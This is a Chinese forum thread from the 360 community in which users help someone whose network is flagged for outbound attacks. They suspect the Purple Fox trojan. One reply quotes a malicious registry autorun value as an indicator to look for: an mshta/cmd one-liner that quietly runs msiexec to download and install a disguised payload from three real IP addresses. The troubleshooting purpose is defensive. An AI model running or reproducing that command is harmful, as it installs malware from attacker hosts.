对外网络攻击,监测到,杀了却没毒 ,怎么搞
来个大佬指导一下吧,我太难啦 您好,您用系统急救箱强力模式扫描修复试试看 本帖最后由 沧桑浪子 于 2024-9-7 09:42 编辑有紫狐木马那味,一般svchost.exe占用也很大!
局域网有多少电脑?
都查下看看
而且会查到类似 MsXXXXXXXXapp.DLL 的文件名
还有什么.log,jpg文件
本帖最后由 沧桑浪子 于 2024-9-7 09:53 编辑
看看有没有类似
注册表值:mshta.exe vb:createobject(w.shell).run(Cmd /c for /d %i in (61.174.50.5:13321 177.137.96.14:12264 78.141.219.184:17508 ) do Msiexec /i http://%i/F12E5CE5.Png /Q,0)(window.close)
处理建议:禁止自启动
这种扫描结果。
【已解决】这是什么病毒?是紫狐吗?_360社区https://bbs.360.cn/thread-15981683-1-1.html 360账号ip河南?
360提示mahta恶意命令执行攻击_360社区https://bbs.360.cn/thread-16096168-1-1.html
这个也是河南。。。
你那是什么公司
把这两个ip的电脑的高危漏洞都打下
页:
[1]